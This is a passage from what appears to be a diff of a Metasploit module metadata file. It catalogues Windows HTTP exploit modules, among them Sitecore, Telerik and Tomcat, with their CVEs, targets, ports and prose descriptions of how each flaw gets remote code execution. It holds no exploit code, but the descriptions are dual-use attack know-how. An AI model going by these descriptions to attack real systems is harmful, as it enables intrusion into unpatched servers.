8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Dropper", - "PowerShell Stager" - ], - "mod_time": "2021-11-11 23:56:11 +0000", - "path": "/modules/exploits/windows/http/sitecore_xp_cve_2021_42237.rb", - "is_install_path": true, - "ref_name": "windows/http/sitecore_xp_cve_2021_42237", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sitecore_xp_cve_2025_27218": { - "name": "Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit", - "fullname": "exploit/windows/http/sitecore_xp_cve_2025_27218", - "aliases": [], - "rank": 600, - "disclosure_date": "2025-01-06", - "type": "exploit", - "author": [ - "Dylan Pindur", - "machang-r7" - ], - "description": "This module exploits a .NET deserialization vulnerability in Sitecore Experience Manager (XM) and Experience\n Platform (XP) 10.4 by injecting a malicious Base64-encoded BinaryFormatter payload into an HTTP header.", - "references": [ - "CVE-2025-27218", - "URL-https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003535", - "URL-https://attackerkb.com/topics/Dyo4zUm2tv/cve-2025-27218" - ], - "platform": "Windows", - "arch": "x86, x64, cmd", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "PowerShell Stager" - ], - "mod_time": "2025-03-27 09:36:10 +0000", - "path": "/modules/exploits/windows/http/sitecore_xp_cve_2025_27218.rb", - "is_install_path": true, - "ref_name": "windows/http/sitecore_xp_cve_2025_27218", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/smartermail_rce": { - "name": "SmarterTools SmarterMail less than build 6985 - .NET Deserialization Remote Code Execution", - "fullname": "exploit/windows/http/smartermail_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-04-17", - "type": "exploit", - "author": [ - "Soroush Dalili", - "1F98D", - "Ismail E. Dawoodjee" - ], - "description": "This module exploits a vulnerability in the SmarterTools SmarterMail\n software for version numbers <= 16.x or for build numbers < 6985.\n The vulnerable versions and builds expose three .NET remoting endpoints\n on port 17001, namely /Servers, /Mail and /Spool. For example, a\n typical installation of SmarterMail Build 6970 will have the /Servers\n endpoint exposed to the public at tcp://0.0.0.0:17001/Servers, where\n serialized .NET commands can be sent through a TCP socket connection.\n\n The three endpoints perform deserialization of untrusted data\n (CVE-2019-7214), allowing an attacker to send arbitrary commands\n to be deserialized and executed. This module exploits this vulnerability\n to perform .NET deserialization attacks, allowing remote code execution\n for any unauthenticated user under the context of the SYSTEM account.\n Successful exploitation results in full administrative control of the\n target server under the NT AUTHORITY\\SYSTEM account.\n\n This vulnerability was patched in Build 6985, where the 17001 port is\n no longer publicly accessible, although it can be accessible locally\n at 127.0.0.1:17001. Hence, this would still allow for a privilege\n escalation vector if the server is compromised as a low-privileged user.", - "references": [ - "CVE-2019-7214", - "EDB-49216", - "URL-https://research.nccgroup.com/2019/04/16/technical-advisory-multiple-vulnerabilities-in-smartermail/" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 9998, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "x86/x64 Windows CmdStager" - ], - "mod_time": "2023-07-09 07:25:09 +0000", - "path": "/modules/exploits/windows/http/smartermail_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/smartermail_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/softing_sis_rce": { - "name": "Softing Secure Integration Server v1.22 Remote Code Execution", - "fullname": "exploit/windows/http/softing_sis_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-07-27", - "type": "exploit", - "author": [ - "Chris Anastasio (muffin) of Incite Team", - "Steven Seeley (mr_me) of Incite Team", - "Imran E. Dawoodjee " - ], - "description": "This module chains two vulnerabilities (CVE-2022-1373 and CVE-2022-2334) to achieve authenticated remote code execution against Softing Secure Integration Server v1.22.\n\n In CVE-2022-1373, the restore configuration feature is vulnerable to a directory traversal vulnerablity when processing zip files. When using the \"restore configuration\" feature to upload a zip file containing a path traversal file which is a dll called ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\wbem\\wbemcomn.dll. This causes the file C:\\Windows\\System32\\wbem\\wbemcomn.dll to be created and executed upon touching the disk.\n\n In CVE-2022-2334, the planted wbemcomn.dll is used in a DLL hijacking attack when Softing Secure Integration Server restarts upon restoring configuration, which allows us to execute arbitrary code on the target system.\n\n The chain demonstrated in Pwn2Own used a signature instead of a password. The signature was acquired by running an ARP spoofing attack against the local network where the Softing SIS server was located. A username is also required for signature authentication.\n\n A custom DLL can be provided to use in the exploit instead of using the default MSF-generated one. Refer to the module documentation for more details.", - "references": [ - "CVE-2022-1373", - "CVE-2022-2334", - "ZDI-22-1154", - "ZDI-22-1156", - "URL-https://industrial.softing.com/fileadmin/psirt/downloads/syt-2022-5.html", - "URL-https://ide0x90.github.io/softing-sis-122-rce/" - ], - "platform": "Windows", - "arch": "x64", - "rport": 8099, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows x64" - ], - "mod_time": "2024-04-19 23:05:02 +0000", - "path": "/modules/exploits/windows/http/softing_sis_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/softing_sis_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/solarwinds_fsm_userlogin": { - "name": "Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability", - "fullname": "exploit/windows/http/solarwinds_fsm_userlogin", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-03-13", - "type": "exploit", - "author": [ - "rgod", - "mr_me ", - "sinn3r " - ], - "description": "This module exploits multiple vulnerabilities found in Solarwinds Firewall Security Manager\n 6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface\n due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set\n the 'username' attribute before authentication. The second problem is that the settings-new.jsp\n file will only check the 'username' attribute before authorizing the 'uploadFile' action,\n which can be exploited and allows the attacker to upload a fake xls host list file to the\n server, and results in arbitrary code execution under the context of SYSTEM.\n\n Depending on the installation, by default the Change Advisor web server is listening on port\n 48080 for an express install. Otherwise, this service may appear on port 8080.\n\n Solarwinds has released a fix for this vulnerability as FSM-v6.6.5-HotFix1.zip, noted in the\n references for this module.", - "references": [ - "CVE-2015-2284", - "OSVDB-81634", - "ZDI-15-107", - "URL-http://downloads.solarwinds.com/solarwinds/Release/HotFix/FSM-v6.6.5-HotFix1.zip" - ], - "platform": "Windows", - "arch": "", - "rport": 48080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Solarwinds Firewall Security Manager 6.6.5" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb", - "is_install_path": true, - "ref_name": "windows/http/solarwinds_fsm_userlogin", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/solarwinds_storage_manager_sql": { - "name": "Solarwinds Storage Manager 5.1.0 SQL Injection", - "fullname": "exploit/windows/http/solarwinds_storage_manager_sql", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-12-07", - "type": "exploit", - "author": [ - "r ", - "muts", - "sinn3r " - ], - "description": "This module exploits a SQL injection found in Solarwinds Storage Manager\n login interface. It will send a malicious SQL query to create a JSP file\n under the web root directory, and then let it download and execute our malicious\n executable under the context of SYSTEM.", - "references": [ - "OSVDB-81634", - "EDB-18818", - "URL-http://ddilabs.blogspot.com/2012/02/solarwinds-storage-manager-server-sql.html", - "URL-http://www.solarwinds.com/documentation/storage/storagemanager/docs/ReleaseNotes/vulnerability.htm" - ], - "platform": "Windows", - "arch": "", - "rport": 9000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Universal" - ], - "mod_time": "2021-02-18 09:18:19 +0000", - "path": "/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb", - "is_install_path": true, - "ref_name": "windows/http/solarwinds_storage_manager_sql", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/sonicwall_scrutinizer_sqli": { - "name": "Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection", - "fullname": "exploit/windows/http/sonicwall_scrutinizer_sqli", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-07-22", - "type": "exploit", - "author": [ - "muts", - "Devon Kearns", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Dell SonicWall Scrutinizer.\n While handling the 'q' parameter, the PHP application does not properly filter\n the user-supplied data, which can be manipulated to inject SQL commands, and\n then gain remote code execution. Please note that authentication is NOT needed\n to exploit this vulnerability.", - "references": [ - "CVE-2012-2962", - "OSVDB-84232", - "EDB-20033", - "BID-54625", - "URL-http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf" - ], - "platform": "PHP", - "arch": "php", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Dell SonicWall Scrutinizer 9.5.1 or older" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb", - "is_install_path": true, - "ref_name": "windows/http/sonicwall_scrutinizer_sqli", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ssrs_navcorrector_viewstate": { - "name": "SQL Server Reporting Services (SSRS) ViewState Deserialization", - "fullname": "exploit/windows/http/ssrs_navcorrector_viewstate", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-02-11", - "type": "exploit", - "author": [ - "Soroush Dalili", - "Spencer McIntyre" - ], - "description": "A vulnerability exists within Microsoft's SQL Server Reporting Services\n which can allow an attacker to craft an HTTP POST request with a\n serialized object to achieve remote code execution. The vulnerability is\n due to the fact that the serialized blob is not signed by the server.", - "references": [ - "CVE-2020-0618", - "URL-https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows (x86)", - "Windows (x64)", - "Windows (cmd)" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb", - "is_install_path": true, - "ref_name": "windows/http/ssrs_navcorrector_viewstate", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/steamcast_useragent": { - "name": "Streamcast HTTP User-Agent Buffer Overflow", - "fullname": "exploit/windows/http/steamcast_useragent", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-01-24", - "type": "exploit", - "author": [ - "LSO ", - "aushack " - ], - "description": "This module exploits a stack buffer overflow in Streamcast <= 0.9.75. By sending\n an overly long User-Agent in an HTTP GET request, an attacker may be able to\n execute arbitrary code.", - "references": [ - "CVE-2008-0550", - "OSVDB-42670", - "URL-http://aluigi.altervista.org/adv/steamcazz-adv.txt", - "BID-33898" - ], - "platform": "Windows", - "arch": "", - "rport": 8000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro English All", - "Windows XP Pro SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/steamcast_useragent.rb", - "is_install_path": true, - "ref_name": "windows/http/steamcast_useragent", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sws_connection_bof": { - "name": "Simple Web Server Connection Header Buffer Overflow", - "fullname": "exploit/windows/http/sws_connection_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-07-20", - "type": "exploit", - "author": [ - "mr.pr0n", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user\n can send a long string data in the Connection Header to causes an overflow on the\n stack when function vsprintf() is used, and gain arbitrary code execution. The\n module has been tested successfully on Windows 7 SP1 and Windows XP SP3.", - "references": [ - "OSVDB-84310", - "EDB-19937", - "URL-http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/sws_connection_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/sws_connection_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sybase_easerver": { - "name": "Sybase EAServer 5.2 Remote Stack Buffer Overflow", - "fullname": "exploit/windows/http/sybase_easerver", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-07-25", - "type": "exploit", - "author": [ - "Unknown" - ], - "description": "This module exploits a stack buffer overflow in the Sybase EAServer Web\n Console. The offset to the SEH frame appears to change depending\n on what version of Java is in use by the remote server, making this\n exploit somewhat unreliable.", - "references": [ - "CVE-2005-2297", - "OSVDB-17996", - "BID-14287" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11", - "Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?", - "Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06", - "Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/sybase_easerver.rb", - "is_install_path": true, - "ref_name": "windows/http/sybase_easerver", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/syncbreeze_bof": { - "name": "Sync Breeze Enterprise GET Buffer Overflow", - "fullname": "exploit/windows/http/syncbreeze_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2017-03-15", - "type": "exploit", - "author": [ - "Daniel Teixeira", - "Andrew Smith", - "Owais Mehtab", - "Milton Valencia (wetw0rk)" - ], - "description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Sync Breeze Enterprise v9.4.28, v10.0.28,\n and v10.1.16, caused by improper bounds checking of the request in\n HTTP GET and POST requests sent to the built-in web server. This\n module has been tested successfully on Windows 7 SP1 x86.", - "references": [ - "CVE-2017-14980" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "Sync Breeze Enterprise v9.4.28", - "Sync Breeze Enterprise v10.0.28", - "Sync Breeze Enterprise v10.1.16" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/syncbreeze_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/syncbreeze_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sysax_create_folder": { - "name": "Sysax Multi Server 5.64 Create Folder Buffer Overflow", - "fullname": "exploit/windows/http/sysax_create_folder", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-07-29", - "type": "exploit", - "author": [ - "Craig Freyman", - "Matt \"hostess\" Andreko" - ], - "description": "This module exploits a stack buffer overflow in the create folder function in\n Sysax Multi Server 5.64. This issue was fixed in 5.66. In order to trigger the\n vulnerability valid credentials with the create folder permission must be provided.\n The HTTP option must be enabled on Sysax too.\n\n This module will log into the server, get a SID token, find the root folder, and\n then proceed to exploit the server. Successful exploits result in SYSTEM access.\n This exploit works on XP SP3, and Server 2003 SP1-SP2.", - "references": [ - "CVE-2012-6530", - "OSVDB-82329", - "EDB-20676", - "EDB-18420", - "URL-http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html", - "URL-http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows XP SP3 / Sysax Multi Server 5.64", - "Windows 2003 SP1-SP2 / Sysax Multi Server 5.64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/sysax_create_folder.rb", - "is_install_path": true, - "ref_name": "windows/http/sysax_create_folder", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/telerik_rau_deserialization": { - "name": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization", - "fullname": "exploit/windows/http/telerik_rau_deserialization", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-12-09", - "type": "exploit", - "author": [ - "Spencer McIntyre", - "Paul Taylor", - "Markus Wulftange", - "Caleb Gross", - "Alvaro Muñoz", - "Oleksandr Mirosh", - "straightblast" - ], - "description": "This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik\n UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET\n assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the\n cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once\n patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running.\n This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').", - "references": [ - "CVE-2017-11317", - "URL-https://github.com/bao7uo/RAU_crypto", - "URL-https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload", - "URL-https://github.com/straightblast/UnRadAsyncUpload/wiki", - "CVE-2019-18935", - "URL-https://github.com/noperator/CVE-2019-18935", - "URL-https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization", - "URL-https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html", - "URL-https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows" - ], - "mod_time": "2021-02-24 20:24:57 +0000", - "path": "/modules/exploits/windows/http/telerik_rau_deserialization.rb", - "is_install_path": true, - "ref_name": "windows/http/telerik_rau_deserialization", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "unreliable-session" - ], - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/telerik_report_server_deserialization": { - "name": "Telerik Report Server Auth Bypass and Deserialization RCE", - "fullname": "exploit/windows/http/telerik_report_server_deserialization", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-06-04", - "type": "exploit", - "author": [ - "SinSinology", - "Soroush Dalili", - "Unknown", - "Spencer McIntyre" - ], - "description": "This module chains an authentication bypass vulnerability (CVE-2024-4358) with a deserialization vulnerability\n (CVE-2024-1800) to obtain remote code execution against Telerik Report Server version 10.0.24.130 and prior.\n The authentication bypass flaw allows an unauthenticated user to create a new user with administrative privileges.\n The USERNAME datastore option can be used to authenticate with an existing account to prevent the creation of a\n new one. The deserialization flaw works by uploading a specially crafted report that when loaded will execute an\n OS command as NT AUTHORITY\\SYSTEM. The module will automatically delete the created report but not the account\n because users are unable to delete themselves.", - "references": [ - "CVE-2024-1800", - "CVE-2024-4358", - "URL-https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 83, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2024-06-06 14:56:33 +0000", - "path": "/modules/exploits/windows/http/telerik_report_server_deserialization.rb", - "is_install_path": true, - "ref_name": "windows/http/telerik_report_server_deserialization", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ], - "RelatedModules": [ - "auxiliary/scanner/http/telerik_report_server_auth_bypass" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/tomcat_cgi_cmdlineargs": { - "name": "Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability", - "fullname": "exploit/windows/http/tomcat_cgi_cmdlineargs", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-04-10", - "type": "exploit", - "author": [ - "Yakov Shafranovich", - "sinn3r " - ], - "description": "This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the\n enableCmdLineArguments setting is set to true, a remote user can abuse this to execute\n system commands, and gain remote code execution.", - "references": [ - "CVE-2019-0232", - "URL-https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/", - "URL-https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Apache Tomcat 9.0 or prior for Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb", - "is_install_path": true, - "ref_name": "windows/http/tomcat_cgi_cmdlineargs", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ], - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/trackercam_phparg_overflow": { - "name": "TrackerCam PHP Argument Buffer Overflow", - "fullname": "exploit/windows/http/trackercam_phparg_overflow", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-02-18", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a simple stack buffer overflow in the\n TrackerCam web server. All current versions of this software\n are vulnerable to a large number of security issues. This\n module abuses the directory traversal flaw to gain\n information about the system and then uses the PHP overflow\n to execute arbitrary code.", - "references": [ - "CVE-2005-0478", - "OSVDB-13953", - "OSVDB-13955", - "BID-12592", - "URL-http://aluigi.altervista.org/adv/tcambof-adv.txt" - ], - "platform": "Windows", - "arch": "", - "rport": 8090, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 English", - "Windows XP English SP0/SP1", - "Windows NT 4.0 SP4/SP5/SP6" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/trackercam_phparg_overflow.rb", - "is_install_path": true, - "ref_name": "windows/http/trackercam_phparg_overflow", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/trackit_file_upload": { - "name": "Numara / BMC Track-It! FileStorageService Arbitrary File Upload", - "fullname": "exploit/windows/http/trackit_file_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-10-07", - "type": "exploit", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits an arbitrary file upload vulnerability in Numara / BMC Track-It!\n v8 to v11.X.\n The application exposes the FileStorageService .NET remoting service on port 9010\n (9004 for version 8) which accepts unauthenticated uploads. This can be abused by\n a malicious user to upload a ASP or ASPX file to the web root leading to arbitrary\n code execution as NETWORK SERVICE or SYSTEM.\n This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,\n 10.0.0.143, 9.0.30.248 and 8.0.2.51.", - "references": [ - "CVE-2014-4872", - "OSVDB-112741", - "US-CERT-VU-121036", - "URL-https://seclists.org/fulldisclosure/2014/Oct/34" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Numara / BMC Track-It! v9 to v11.X - Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/trackit_file_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/trackit_file_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/trendmicro_officescan": { - "name": "Trend Micro OfficeScan Remote Stack Buffer Overflow", - "fullname": "exploit/windows/http/trendmicro_officescan", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-06-28", - "type": "exploit", - "author": [ - "toto" - ], - "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan\n cgiChkMasterPwd.exe (running with SYSTEM privileges).", - "references": [ - "CVE-2008-1365", - "OSVDB-42499" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 - Trend Micro OfficeScan 7.3.0.1293)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/trendmicro_officescan.rb", - "is_install_path": true, - "ref_name": "windows/http/trendmicro_officescan", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/trendmicro_officescan_widget_exec": { - "name": "Trend Micro OfficeScan Remote Code Execution", - "fullname": "exploit/windows/http/trendmicro_officescan_widget_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-10-07", - "type": "exploit", - "author": [ - "mr_me ", - "Mehmet Ince " - ], - "description": "This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a\n terminal command under the context of the web server user.\n\n The specific flaw exists within the management interface, which listens on TCP port 443 by default. The Trend Micro Officescan product\n has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which\n leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process\n does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,\n unauthenticated users can execute a terminal command under the context of the web server user.", - "references": [ - "CVE-2017-11394", - "URL-https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/", - "URL-http://www.zerodayinitiative.com/advisories/ZDI-17-521/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting", - "OfficeScan 11", - "OfficeScan XG" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/trendmicro_officescan_widget_exec.rb", - "is_install_path": true, - "ref_name": "windows/http/trendmicro_officescan_widget_exec", - "check": true, - 